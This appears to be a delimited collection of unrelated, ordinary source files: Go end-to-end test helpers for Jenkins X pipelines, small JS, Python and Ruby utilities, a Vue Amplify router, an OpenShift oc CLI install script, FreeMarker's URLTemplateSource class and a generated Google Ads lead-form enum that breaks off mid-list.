	o.Infof("next PipelineActivity release build number is: #%s", o.ReleaseBuildNumber)
	return o.ReleaseBuildNumber
}
// waitForReleasePipelineToComplete waits for the main-branch PipelineActivity
// with the given build number to terminate and asserts that it succeeded.
func (o *Options) waitForReleasePipelineToComplete(buildNumber string) *v1.PipelineActivity {
	t := o.T
	jxClient := o.JXClient
	ns := o.Namespace
	ctx := context.Background()
	selector := o.ActivitySelector(o.MainBranch)
	lastStatusString := ""
	var answer *v1.PipelineActivity
	fn := func(elapsed time.Duration) (bool, error) {
		resources, err := jxClient.JenkinsV1().PipelineActivities(ns).List(ctx, metav1.ListOptions{LabelSelector: selector})
		if err != nil && apierrors.IsNotFound(err) {
			// Missing resources just mean the pipeline has not started yet.
			err = nil
		}
		if err != nil {
			return false, errors.Wrapf(err, "failed to list PipelineActivity resources in namespace %s with selector %s", ns, selector)
		}
		for i := range resources.Items {
			r := &resources.Items[i]
			buildName := r.Spec.Build
			if buildName != buildNumber {
				continue
			}
			ps := &r.Spec
			status := string(ps.Status)
			// Only log status transitions to keep the test log readable.
			if status != lastStatusString {
				lastStatusString = status
				o.Infof("PipelineActivity %s has status %s", info(r.Name), info(status))
			}
			if ps.Status.IsTerminated() {
				answer = r
				return true, nil
			}
		}
		return false, nil
	}
	message := fmt.Sprintf("release complete for PipelineActivity build %s with selector %s", info(o.ReleaseBuildNumber), info(selector))
	err := o.PollLoop(o.PullRequestPollTimeout, o.ReleasePollPeriod, message, fn)
	require.NoError(t, err, "failed to %s", message)
	require.NotNil(t, answer, "no PipelineActivity found for %s", message)
	require.Equal(t, v1.ActivityStatusTypeSucceeded, answer.Spec.Status, "status for %s", message)
	return answer
}
// getLatestPipelineActivity returns the PipelineActivity with the highest
// numeric build number for the given branch, together with that number and
// the selector used. pa is nil (and buildNumber 0) when no activity with a
// numeric build name exists.
func (o *Options) getLatestPipelineActivity(branch string) (pa *v1.PipelineActivity, buildNumber int, selector string, err error) {
	jxClient := o.JXClient
	ns := o.Namespace
	ctx := context.Background()
	selector = o.ActivitySelector(branch)
	var resources *v1.PipelineActivityList
	resources, err = jxClient.JenkinsV1().PipelineActivities(ns).List(ctx, metav1.ListOptions{LabelSelector: selector})
	if err != nil && apierrors.IsNotFound(err) {
		// No activities yet is not an error.
		err = nil
	}
	if err != nil {
		return
	}
	for i := range resources.Items {
		r := &resources.Items[i]
		buildName := r.Spec.Build
		if buildName != "" {
			// Non-numeric build names are skipped with a warning.
			b, err := strconv.Atoi(buildName)
			if err != nil {
				o.Warnf("failed to convert build number %s to number for PipelineActivity %s: %s", buildName, r.Name, err.Error())
				continue
			}
			if b > buildNumber {
				buildNumber = b
				pa = r
			}
		}
	}
	return
}
// verifyPreviewEnvironment locates the preview-environment URL recorded on
// the PR's PipelineActivity and asserts that it answers with the expected
// HTTP status code.
func (o *Options) verifyPreviewEnvironment(pr *scm.PullRequest) {
	t := o.T
	branch := fmt.Sprintf("PR-%d", pr.Number)
	pa, _, selector, err := o.getLatestPipelineActivity(branch)
	require.NoError(t, err, "failed to find latest PipelineActivity for branch %s", branch)
	require.NotNil(t, pa, "could not find a PipelineActivity for selector %s", selector)

	// The preview URL is recorded on the first step that carries one.
	previewURL := ""
	for i := range pa.Spec.Steps {
		s := &pa.Spec.Steps[i]
		preview := s.Preview
		if preview != nil {
			previewURL = preview.ApplicationURL
			if previewURL != "" {
				break
			}
		}
	}
	require.NotEmpty(t, previewURL, "could not find a Preview URL for PipelineActivity %s", pa.Name)
	o.Infof("found preview URL: %s", info(previewURL))

	statusCode := o.GetAppHttpStatusCode()
	o.AssertURLReturns(previewURL, statusCode, o.PullRequestPollTimeout, o.ReleasePollPeriod)
}
// GetAppHttpStatusCode returns the HTTP status code the deployed application
// is expected to answer with on its home page.
func (o *Options) GetAppHttpStatusCode() int {
	// spring quickstarts return 404 for the home page
	if strings.HasPrefix(o.Repository, "spring") {
		return 404
	}
	return 200
}
// AssertURLReturns expects that the given URL returns the given status code
// within the given time period, polling every pollPeriod.
func (o *Options) AssertURLReturns(url string, expectedStatusCode int, pollTimeout, pollPeriod time.Duration) error {
	lastLogMessage := ""
	// De-duplicate consecutive identical log lines.
	logMessage := func(message string) {
		if message != lastLogMessage {
			lastLogMessage = message
			o.Infof(message)
		}
	}
	fn := func(elapsed time.Duration) (bool, error) {
		actualStatusCode, err := o.GetURLStatusCode(url, logMessage)
		if err != nil {
			// Treat fetch errors as "not ready yet" and keep polling.
			return false, nil
		}
		return actualStatusCode == expectedStatusCode, nil
	}
	message := fmt.Sprintf("expecting status %d on URL %s", expectedStatusCode, url)
	return o.PollLoop(pollTimeout, pollPeriod, message, fn)
}
// GetURLStatusCode invokes the URL with a 30s timeout and returns the HTTP
// status code. logMessage reports progress/errors (callers use it to
// de-duplicate log lines). TLS verification honours o.InsecureURLSkipVerify.
func (o *Options) GetURLStatusCode(url string, logMessage func(message string)) (int, error) {
	transport := &http.Transport{
		TLSClientConfig: &tls.Config{
			InsecureSkipVerify: o.InsecureURLSkipVerify,
		},
	}
	var httpClient = &http.Client{
		Timeout:   time.Second * 30,
		Transport: transport,
	}
	response, err := httpClient.Get(url)
	if err != nil {
		errorMessage := err.Error()
		if response != nil {
			errorMessage += " status: " + response.Status
		}
		message := fmt.Sprintf("failed to invoke URL %s got: %s", info(url), errorMessage)
		logMessage(message)
		return 0, errors.Wrap(err, message)
	}
	// BUGFIX: the response body must be closed to avoid leaking connections;
	// the original implementation never closed it.
	defer response.Body.Close()
	actualStatusCode := response.StatusCode
	logMessage(fmt.Sprintf("invoked URL %s and got return code: %s", info(url), info(strconv.Itoa(actualStatusCode))))
	return actualStatusCode, nil
}
// waitForPullRequestToMerge first waits for the PR's pipeline to terminate
// successfully, then polls the SCM provider until the pull request reports
// merged (or closed), recording the merge SHA in o.MergeSHA. Returns the
// last fetched pull request state.
func (o *Options) waitForPullRequestToMerge(pullRequest *scm.PullRequest) *scm.PullRequest {
	t := o.T
	jxClient := o.JXClient
	ns := o.Namespace
	logNoMergeCommitSha := false
	logHasMergeSha := false
	message := fmt.Sprintf("pull request %s to merge", info(pullRequest.Link))
	ctx := context.Background()
	repository := pullRequest.Repository()
	fullName := repository.FullName
	prNumber := pullRequest.Number
	o.MergeSHA = ""
	var err error
	var pr *scm.PullRequest
	selector := o.PromoteSelector(&repository, "PR-"+strconv.Itoa(prNumber))
	lastStatus := ""
	// Phase 1: wait for the PR's pipeline to terminate successfully.
	fn := func(elapsed time.Duration) (bool, error) {
		// lets wait for there to be at least one PipelineActivity for this branch and for them all to have completed
		resources, err := jxClient.JenkinsV1().PipelineActivities(ns).List(ctx, metav1.ListOptions{LabelSelector: selector})
		if err != nil && apierrors.IsNotFound(err) {
			err = nil
		}
		if err != nil {
			return false, errors.Wrapf(err, "failed to list PipelineActivity resources in namespace %s with selector %s", ns, selector)
		}
		status := ""
		prPipelineComplete := false
		if len(resources.Items) == 0 {
			status = fmt.Sprintf("no PipelineActivity resources found in namespace %s with selector %s", ns, selector)
		} else {
			for i := range resources.Items {
				r := &resources.Items[i]
				status = fmt.Sprintf("PipelineActivity %s has status %s", r.Name, string(r.Spec.Status))
				if r.Spec.Status.IsTerminated() {
					if r.Spec.Status == v1.ActivityStatusTypeSucceeded {
						prPipelineComplete = true
						status += "\nnow polling for PullRequest being merged..."
					} else {
						err = errors.Errorf("PipelineActivity %s has status %s", r.Name, string(r.Spec.Status))
					}
				}
			}
		}
		// Only log status transitions to avoid flooding the test log.
		if status != lastStatus {
			o.Infof(status)
			lastStatus = status
		}
		return prPipelineComplete, err
	}
	err = o.PollLoop(o.ReleasePollTimeout, o.ReleasePollPeriod, message, fn)
	require.NoError(t, err, "failed to %s", message)

	// lets sleep a little bit to give keeper a chance to auto merge to minimise github API calls...
	time.Sleep(30 * time.Second)

	// Phase 2: poll the SCM provider until the PR is merged (or closed).
	fn = func(elapsed time.Duration) (bool, error) {
		pr, _, err = o.ScmFactory.ScmClient.PullRequests.Find(ctx, fullName, prNumber)
		if err != nil {
			o.Warnf("Failed to query the Pull Request status for %s %s", pullRequest.Link, err)
		} else {
			if pr.MergeSha != "" {
				o.MergeSHA = pr.MergeSha
			}
			elaspedString := elapsed.String()
			if pr.Merged {
				// A merged PR may briefly lack its merge SHA; keep polling
				// until the SHA is available.
				if pr.MergeSha == "" && o.MergeSHA == "" {
					if !logNoMergeCommitSha {
						logNoMergeCommitSha = true
						o.Infof("Pull Request %s is merged but we don't yet have a merge SHA after waiting %s", info(pr.Link), elaspedString)
						return false, nil
					}
				} else {
					if !logHasMergeSha {
						logHasMergeSha = true
						o.Infof("Pull Request %s is merged at sha %s after waiting %s", info(pr.Link), info(o.MergeSHA), elaspedString)
						return true, nil
					}
				}
			} else {
				if pr.Closed {
					o.Warnf("Pull Request %s is closed after waiting %s", info(pr.Link), elaspedString)
					return true, nil
				}
			}
		}
		return false, nil
	}
	err = o.PollLoop(o.PullRequestPollTimeout, o.PullRequestPollPeriod, message, fn)
	require.NoError(t, err, "failed to %s", message)
	return pr
}
// waitForPromotePullRequestToMerge follows the promotion triggered by a
// release: finds the promote PR recorded on the release PipelineActivity,
// waits for it to merge, for the boot Job of the merge commit to succeed,
// and finally for the released version to be live in Staging.
func (o *Options) waitForPromotePullRequestToMerge(pa *v1.PipelineActivity) {
	t := o.T
	version := pa.Spec.Version

	// The promote PR URL is recorded on the first step that carries one.
	prURL := ""
	for i := range pa.Spec.Steps {
		s := &pa.Spec.Steps[i]
		promote := s.Promote
		if promote != nil && promote.PullRequest != nil {
			prURL = promote.PullRequest.PullRequestURL
			if prURL != "" {
				break
			}
		}
	}
	require.NotEmpty(t, version, "could not find the version for PipelineActivity %s", pa.Name)
	require.NotEmpty(t, prURL, "could not find the Promote PullRequest URL for PipelineActivity %s", pa.Name)
	o.Infof("found Promote Pull Request: %s", info(prURL))

	pr, err := scmhelpers.ParsePullRequestURL(prURL)
	require.NoError(t, err, "failed to parse Pull Request: %s", prURL)

	o.waitForPullRequestToMerge(pr)
	require.NotEmpty(t, o.MergeSHA, "no merge SHA for the promote Pull Request %s", prURL)
	o.waitForSuccessfulBootJob(o.MergeSHA)
	o.waitForVersionInStaging(version)
}
// waitForSuccessfulBootJob waits for the jx-boot Job created for the given
// merge commit SHA to finish and asserts that it succeeded.
func (o *Options) waitForSuccessfulBootJob(sha string) {
	t := o.T
	selector := "app=jx-boot,git-operator.jenkins.io/commit-sha=" + sha
	message := fmt.Sprintf("successful Job in namespace %s with selector %s", info(o.GitOperatorNamespace), info(selector))
	ctx := context.Background()
	ns := o.GitOperatorNamespace
	kubeClient := o.KubeClient
	lastStatus := ""
	fn := func(elapsed time.Duration) (bool, error) {
		resources, err := kubeClient.BatchV1().Jobs(ns).List(ctx, metav1.ListOptions{LabelSelector: selector})
		if err != nil && apierrors.IsNotFound(err) {
			err = nil
		}
		if err != nil {
			return false, errors.Wrapf(err, "failed to list Jobs in namespace %s with selector %s", ns, selector)
		}
		jobName := ""
		answer := false
		status := "Pending"
		count := len(resources.Items)
		if count == 0 {
			status = fmt.Sprintf("no jobs found matching selector %s", selector)
		} else {
			if count > 1 {
				// BUGFIX: count is an int, so use %d — the original used %s,
				// which renders as %!s(int=N).
				o.Warnf("found %d Jobs in namespace %s with selector %s", count, ns, selector)
			}
			// lets use the last one
			job := &resources.Items[count-1]
			jobName = job.Name
			if jobs.IsJobFinished(job) {
				if jobs.IsJobSucceeded(job) {
					status = "Succeeded"
					answer = true
				} else {
					status = "Failed"
					err = errors.Errorf("job %s has failed", job.Name)
				}
			} else {
				if job.Status.Active > 0 {
					status = "Running"
				}
			}
		}
		// Only log status transitions to keep the test output readable.
		if status != lastStatus {
			lastStatus = status
			if jobName != "" {
				o.Infof("boot Job %s has status: %s", info(jobName), info(status))
			} else {
				o.Infof("status: %s", info(status))
			}
		}
		return answer, err
	}
	err := o.PollLoop(o.ReleasePollTimeout, o.ReleasePollPeriod, message, fn)
	require.NoError(t, err, "failed to poll for completed Job in namespace %s for selector %s", ns, selector)
}
// waitForVersionInStaging polls the Staging environment until a deployment of
// the application under test reports the given version and its URL answers
// with the expected HTTP status code.
func (o *Options) waitForVersionInStaging(version string) {
	t := o.T
	message := fmt.Sprintf("waiting for version %s to be in Staging", info(version))
	ns := o.Namespace
	expectedStatusCode := o.GetAppHttpStatusCode()
	lastStatus := ""
	fn := func(elapsed time.Duration) (bool, error) {
		list, err := applications.GetApplications(o.JXClient, o.KubeClient, ns)
		if err != nil {
			return false, errors.Wrap(err, "fetching applications")
		}
		answer := false
		status := ""
		if len(list.Items) == 0 {
			status = "No applications found"
		}
		for i := range list.Items {
			app := &list.Items[i]
			name := app.Name()
			// Only inspect the application belonging to the repository under test.
			if !strings.HasPrefix(name, o.Repository) {
				continue
			}
			envs := app.Environments
			if envs != nil {
				env := envs["staging"]
				depName := ""
				foundVersion := ""
				for j := range env.Deployments {
					dep := &env.Deployments[j]
					depVersion := dep.Version()
					if version == depVersion {
						appURL := dep.URL(o.KubeClient, app)
						status = fmt.Sprintf("has version %s running in staging at: %s", version, appURL)
						if appURL != "" {
							logMessage := func(message string) {
								status += " " + message
							}
							actualStatusCode, err := o.GetURLStatusCode(appURL, logMessage)
							if err != nil {
								// BUGFIX: the original passed no argument for
								// the %s verb in this warning.
								o.Warnf("failed to get URL %s: %s", appURL, err.Error())
							} else {
								status += fmt.Sprintf(" got status code %d", actualStatusCode)
								if actualStatusCode == expectedStatusCode {
									answer = true
								}
							}
						}
						break
					} else {
						foundVersion = depVersion
						depName = dep.Name
					}
				}
				if !answer {
					o.Infof("app %s has deployment %s with version %s", name, depName, foundVersion)
				}
			}
		}
		if status != lastStatus {
			lastStatus = status
			o.Infof(status)
		}
		return answer, nil
	}
	err := o.PollLoop(o.ReleasePollTimeout, o.ReleasePollPeriod, message, fn)
	// BUGFIX: the original passed an extra argument (ns) not covered by the
	// format string; include both values explicitly.
	require.NoError(t, err, "failed to wait for version %s to be in Staging in namespace %s", version, ns)
}
|
/**
 * Finds the pair of distinct cities with the smallest distance in a
 * distance matrix.
 *
 * @param {number[][]} distMatrix - square matrix where distMatrix[i][j] is
 *   the distance from city i to city j
 * @returns {{source: number, dest: number, minDistance: number}} indices of
 *   the closest pair and their distance
 */
function minDistance(distMatrix) {
  const cityCount = distMatrix.length;
  let best = { source: 0, dest: 0, minDistance: Infinity };
  for (let from = 0; from < cityCount; from++) {
    for (let to = 0; to < cityCount; to++) {
      // Skip the diagonal: a city's distance to itself is not a trip.
      if (from === to) continue;
      const candidate = distMatrix[from][to];
      if (candidate < best.minDistance) {
        best = { source: from, dest: to, minDistance: candidate };
      }
    }
  }
  return best;
}
minDistance([[0, 9, 11, 7], [9, 0, 10, 15], [11, 10, 0, 6], [7, 15, 6, 0]]);
|
/*
* Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0/
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*
* Note: this file was adapted from the sample at https://github.com/aws-samples/aws-amplify-vue/blob/master/src/router/index.js
*/
import Vue from 'vue';
import Router from 'vue-router';
import BroadcastMonitor from '@/components/BroadcastMonitor';
import Signin from '@/components/Signin';
import {AmplifyEventBus} from 'aws-amplify-vue';
import Amplify, * as AmplifyModules from 'aws-amplify'; // eslint-disable-line
import {AmplifyPlugin} from 'aws-amplify-vue';
import AmplifyStore from '../store/store';
Vue.use(Router);
Vue.use(AmplifyPlugin, AmplifyModules);
// Module-level cache of the signed-in user (set by the authState handler
// and by the beforeResolve guard below).
let user;

// On module load, check for an existing session; if a user is already
// signed in, start at the home route.
// NOTE(review): the arrow-function parameter shadows the module-level
// `user`, so this initial lookup does NOT populate the cache above —
// confirm that is intentional.
getUser().then((user) => {
  if (user) {
    router.push({path: '/'})
  }
})

// Keep the Vuex store and the current route in sync with Amplify auth
// state transitions ('signedIn' / 'signedOut').
AmplifyEventBus.$on('authState', async (state) => {
  console.log(state) // eslint-disable-line
  if (state === 'signedOut') {
    user = null;
    AmplifyStore.commit('setUser', null);
    router.push({path: '/auth'})
  } else if (state === 'signedIn') {
    user = await getUser();
    router.push({path: '/'})
  }
});
// Resolve the currently authenticated Amplify user and commit it to the
// Vuex store. Resolves to the user data when a valid session exists;
// commits null and resolves to null when authentication fails (resolves
// to undefined when data lacks a signInUserSession).
function getUser() {
  return Vue.prototype.$Amplify.Auth.currentAuthenticatedUser().then((data) => {
    if (data && data.signInUserSession) {
      AmplifyStore.commit('setUser', data);
      return data;
    }
  }).catch((e) => { // eslint-disable-line
    AmplifyStore.commit('setUser', null);
    return null
  });
}
// Route table: the broadcast monitor home page (requires authentication)
// and the sign-in page.
const router = new Router({
  routes: [
    {
      path: '/',
      name: 'Home',
      component: BroadcastMonitor,
      meta: {requiresAuth: true}
    },
    {
      path: '/auth',
      name: 'Authenticator',
      component: Signin
    }
  ]
});
// Global navigation guard: for any matched route flagged requiresAuth,
// re-check the session and redirect unauthenticated visitors to /auth,
// preserving the intended destination in the `redirect` query parameter.
router.beforeResolve(async (to, from, next) => {
  if (to.matched.some(record => record.meta.requiresAuth)) {
    user = await getUser();
    if (!user) {
      return next({
        path: '/auth',
        query: {
          redirect: to.fullPath,
        }
      });
    }
    return next()
  }
  return next()
})

export default router
|
def find_min_shares_stock(portfolio):
    """Return the name of the holding with the fewest shares.

    Args:
        portfolio: iterable of mappings, each with at least the keys
            ``'name'`` and ``'shares'``.

    Returns:
        The ``'name'`` of the entry whose ``'shares'`` value is smallest
        (first such entry on ties).

    Raises:
        ValueError: if ``portfolio`` is empty.
    """
    def shares_of(holding):
        return holding['shares']

    return min(portfolio, key=shares_of)['name']
|
import subprocess
# placeholder
|
#!/bin/bash -e
################################################################################
## File: oc.sh
## Desc: Installs the OC CLI
################################################################################

# Pull in the shared download_with_retries helper.
# Quoted to survive paths containing spaces.
source "$HELPER_SCRIPTS/install.sh"

# Install the oc CLI
DOWNLOAD_URL="https://mirror.openshift.com/pub/openshift-v4/clients/ocp/latest/openshift-client-linux.tar.gz"
PACKAGE_TAR_NAME="oc.tar.gz"
download_with_retries "$DOWNLOAD_URL" "/tmp" "$PACKAGE_TAR_NAME"
tar xvzf "/tmp/$PACKAGE_TAR_NAME" -C "/usr/local/bin"

# Validate the installation (discard the path that `command -v` prints).
echo "Validate the installation"
if ! command -v oc > /dev/null; then
    echo "oc was not installed"
    exit 1
fi
|
<head>
    <!-- Charset declaration first: it must appear before any other content
         (and within the first 1024 bytes) so the parser decodes correctly. -->
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>My Title</title>
</head>
|
<reponame>itsNikolay/dry-configurable
# A collection of micro-libraries, each intended to encapsulate
# a common task in Ruby
module Dry
  module Configurable
    # Base error for the library; all dry-configurable errors inherit from it
    # so callers can rescue Dry::Configurable::Error to catch everything.
    # All constants use the explicit top-level ::Class form consistently.
    Error = ::Class.new(::StandardError)
    AlreadyDefinedConfigError = ::Class.new(Error)
    FrozenConfigError = ::Class.new(Error)
    NotConfiguredError = ::Class.new(Error)
  end
end
|
import os
def simulate_setns(fd):
    """Join the namespace referred to by ``fd`` (network namespace here).

    The caller's descriptor is re-opened via ``/proc/self/fd/<fd>`` (which
    behaves like a dup), passed to ``os.setns``, and the duplicate is always
    closed afterwards — including when ``setns`` fails, which the original
    code leaked.

    Requires ``os.setns``/``os.CLONE_NEWNET`` (Python 3.12+), a Linux host,
    and typically elevated privileges — TODO confirm in the target env.

    Raises:
        OSError: if the open or the setns syscall fails.
    """
    # Open the file descriptor to the namespace
    ns_fd = os.open(f"/proc/self/fd/{fd}", os.O_RDONLY)
    try:
        # Call the setns syscall to associate the calling process with the namespace
        os.setns(ns_fd, os.CLONE_NEWNET)  # Example: CLONE_NEWNET for network namespace
    finally:
        # Close the duplicate descriptor even if setns raised.
        os.close(ns_fd)
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package freemarker.cache;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.net.JarURLConnection;
import java.net.URL;
import java.net.URLConnection;
/**
* Wraps a <code>java.net.URL</code>, and implements methods required for a typical template source.
*/
class URLTemplateSource {

    /** The wrapped URL; sole identity of this source (see equals/hashCode). */
    private final URL url;
    /** Connection to {@link #url}; re-opened by getInputStream() on reuse, nulled by close(). */
    private URLConnection conn;
    /** Stream last handed out by getInputStream(), or {@code null} when none is open. */
    private InputStream inputStream;
    /** Caching preference applied to connections; {@code null} when the parent loader set none. */
    private Boolean useCaches;

    /**
     * @param useCaches {@code null} if this aspect wasn't set in the parent {@link TemplateLoader}.
     */
    URLTemplateSource(URL url, Boolean useCaches) throws IOException {
        this.url = url;
        this.conn = url.openConnection();
        this.useCaches = useCaches;
        if (useCaches != null) {
            conn.setUseCaches(useCaches.booleanValue());
        }
    }

    /** Two sources are equal if and only if they wrap equal URLs. */
    @Override
    public boolean equals(Object o) {
        if (o instanceof URLTemplateSource) {
            return url.equals(((URLTemplateSource) o).url);
        } else {
            return false;
        }
    }

    @Override
    public int hashCode() {
        return url.hashCode();
    }

    @Override
    public String toString() {
        return url.toString();
    }

    /**
     * Returns the last-modified time of the resource, or -1 when it cannot
     * be determined (same convention as {@link URLConnection#getLastModified()}).
     */
    long lastModified() {
        if (conn instanceof JarURLConnection) {
            // There is a bug in sun's jar url connection that causes file handle leaks when calling getLastModified()
            // Since the time stamps of jar file contents can't vary independent from the jar file timestamp, just use
            // the jar file timestamp
            URL jarURL = ((JarURLConnection) conn).getJarFileURL();
            if (jarURL.getProtocol().equals("file")) {
                // Return the last modified time of the underlying file - saves some opening and closing
                return new File(jarURL.getFile()).lastModified();
            } else {
                // Use the URL mechanism
                URLConnection jarConn = null;
                try {
                    jarConn = jarURL.openConnection();
                    return jarConn.getLastModified();
                } catch (IOException e) {
                    return -1;
                } finally {
                    // Close the connection's stream so the handle is released.
                    try {
                        if (jarConn != null) jarConn.getInputStream().close();
                    } catch (IOException e) { }
                }
            }
        } else {
            long lastModified = conn.getLastModified();
            if (lastModified == -1L && url.getProtocol().equals("file")) {
                // Hack for obtaining accurate last modified time for
                // URLs that point to the local file system. This is fixed
                // in JDK 1.4, but prior JDKs returns -1 for file:// URLs.
                return new File(url.getFile()).lastModified();
            } else {
                return lastModified;
            }
        }
    }

    /**
     * Opens (or re-opens) the resource and returns a stream positioned at
     * its beginning. A previously returned stream is closed first and the
     * connection re-opened, so each call reads from the start.
     */
    InputStream getInputStream() throws IOException {
        if (inputStream != null) {
            // Ensure that the returned InputStream reads from the beginning of the resource when getInputStream()
            // is called for the second time:
            try {
                inputStream.close();
            } catch (IOException e) {
                // Ignore; this is maybe because it was closed for the 2nd time now
            }
            this.conn = url.openConnection();
        }
        inputStream = conn.getInputStream();
        return inputStream;
    }

    /**
     * Releases the open stream (or, when none was handed out, the
     * connection's own stream) and clears both references.
     */
    void close() throws IOException {
        try {
            if (inputStream != null) {
                inputStream.close();
            } else {
                conn.getInputStream().close();
            }
        } finally {
            inputStream = null;
            conn = null;
        }
    }

    /** The caching preference recorded at construction/last setUseCaches call, or {@code null}. */
    Boolean getUseCaches() {
        return useCaches;
    }

    /**
     * Applies the caching preference to the current connection.
     * No-op after close() (when {@code conn} is null), in which case the
     * recorded preference is also left unchanged.
     */
    void setUseCaches(boolean useCaches) {
        if (this.conn != null) {
            conn.setUseCaches(useCaches);
            this.useCaches = Boolean.valueOf(useCaches);
        }
    }
}
|
# frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
  module Ads
    module GoogleAds
      module V8
        module Enums
          # Describes the input type of a lead form field.
          # NOTE: this file is generated (see header); hand edits will be
          # overwritten on regeneration.
          class LeadFormFieldUserInputTypeEnum
            include ::Google::Protobuf::MessageExts
            extend ::Google::Protobuf::MessageExts::ClassMethods

            # Enum describing the input type of a lead form field.
            # Values below 1000 are generic contact fields; values >= 1000 are
            # category-specific questions grouped by vertical (see the
            # "Category:" notes on each constant). Numbering is sparse.
            module LeadFormFieldUserInputType
              # Not specified.
              UNSPECIFIED = 0

              # Used for return value only. Represents value unknown in this version.
              UNKNOWN = 1

              # The user will be asked to fill in their given and family name. This field
              # cannot be set at the same time as GIVEN_NAME or FAMILY_NAME.
              FULL_NAME = 2

              # The user will be asked to fill in their email address.
              EMAIL = 3

              # The user will be asked to fill in their phone number.
              PHONE_NUMBER = 4

              # The user will be asked to fill in their zip code.
              POSTAL_CODE = 5

              # The user will be asked to fill in their city.
              CITY = 9

              # The user will be asked to fill in their region part of the address (e.g.
              # state for US, province for Canada).
              REGION = 10

              # The user will be asked to fill in their country.
              COUNTRY = 11

              # The user will be asked to fill in their work email address.
              WORK_EMAIL = 12

              # The user will be asked to fill in their company name.
              COMPANY_NAME = 13

              # The user will be asked to fill in their work phone.
              WORK_PHONE = 14

              # The user will be asked to fill in their job title.
              JOB_TITLE = 15

              # The user will be asked to fill in their first name. This
              # field can not be set at the same time as FULL_NAME.
              FIRST_NAME = 23

              # The user will be asked to fill in their last name. This
              # field can not be set at the same time as FULL_NAME.
              LAST_NAME = 24

              # Question: "Which model are you interested in?"
              # Category: "Auto"
              VEHICLE_MODEL = 1001

              # Question: "Which type of vehicle are you interested in?"
              # Category: "Auto"
              VEHICLE_TYPE = 1002

              # Question: "What is your preferred dealership?"
              # Category: "Auto"
              PREFERRED_DEALERSHIP = 1003

              # Question: "When do you plan on purchasing a vehicle?"
              # Category: "Auto"
              VEHICLE_PURCHASE_TIMELINE = 1004

              # Question: "Do you own a vehicle?"
              # Category: "Auto"
              VEHICLE_OWNERSHIP = 1005

              # Question: "What vehicle ownership option are you interested in?"
              # Category: "Auto"
              VEHICLE_PAYMENT_TYPE = 1009

              # Question: "What type of vehicle condition are you interested in?"
              # Category: "Auto"
              VEHICLE_CONDITION = 1010

              # Question: "What size is your company?"
              # Category: "Business"
              COMPANY_SIZE = 1006

              # Question: "What is your annual sales volume?"
              # Category: "Business"
              ANNUAL_SALES = 1007

              # Question: "How many years have you been in business?"
              # Category: "Business"
              YEARS_IN_BUSINESS = 1008

              # Question: "What is your job department?"
              # Category: "Business"
              JOB_DEPARTMENT = 1011

              # Question: "What is your job role?"
              # Category: "Business"
              JOB_ROLE = 1012

              # Question: "Which program are you interested in?"
              # Category: "Education"
              EDUCATION_PROGRAM = 1013

              # Question: "Which course are you interested in?"
              # Category: "Education"
              EDUCATION_COURSE = 1014

              # Question: "Which product are you interested in?"
              # Category: "General"
              PRODUCT = 1016

              # Question: "Which service are you interested in?"
              # Category: "General"
              SERVICE = 1017

              # Question: "Which offer are you interested in?"
              # Category: "General"
              OFFER = 1018

              # Question: "Which category are you interested in?"
              # Category: "General"
              CATEGORY = 1019

              # Question: "What is your preferred method of contact?"
              # Category: "General"
              PREFERRED_CONTACT_METHOD = 1020

              # Question: "What is your preferred location?"
              # Category: "General"
              PREFERRED_LOCATION = 1021

              # Question: "What is the best time to contact you?"
              # Category: "General"
              PREFERRED_CONTACT_TIME = 1022

              # Question: "When are you looking to make a purchase?"
              # Category: "General"
              PURCHASE_TIMELINE = 1023

              # Question: "How many years of work experience do you have?"
              # Category: "Jobs"
              YEARS_OF_EXPERIENCE = 1048

              # Question: "What industry do you work in?"
              # Category: "Jobs"
              JOB_INDUSTRY = 1049

              # Question: "What is your highest level of education?"
              # Category: "Jobs"
              LEVEL_OF_EDUCATION = 1050

              # Question: "What type of property are you looking for?"
              # Category: "Real Estate"
              PROPERTY_TYPE = 1024

              # Question: "What do you need a realtor's help with?"
              # Category: "Real Estate"
              REALTOR_HELP_GOAL = 1025

              # Question: "What neighborhood are you interested in?"
              # Category: "Real Estate"
              PROPERTY_COMMUNITY = 1026

              # Question: "What price range are you looking for?"
              # Category: "Real Estate"
              PRICE_RANGE = 1027

              # Question: "How many bedrooms are you looking for?"
              # Category: "Real Estate"
              NUMBER_OF_BEDROOMS = 1028

              # Question: "Are you looking for a fully furnished property?"
              # Category: "Real Estate"
              FURNISHED_PROPERTY = 1029

              # Question: "Are you looking for properties that allow pets?"
              # Category: "Real Estate"
              PETS_ALLOWED_PROPERTY = 1030

              # Question: "What is the next product you plan to purchase?"
              # Category: "Retail"
              NEXT_PLANNED_PURCHASE = 1031

              # Question: "Would you like to sign up for an event?"
              # Category: "Retail"
              EVENT_SIGNUP_INTEREST = 1033

              # Question: "Where are you interested in shopping?"
              # Category: "Retail"
              PREFERRED_SHOPPING_PLACES = 1034

              # Question: "What is your favorite brand?"
              # Category: "Retail"
              FAVORITE_BRAND = 1035

              # Question: "Which type of valid commercial license do you have?"
              # Category: "Transportation"
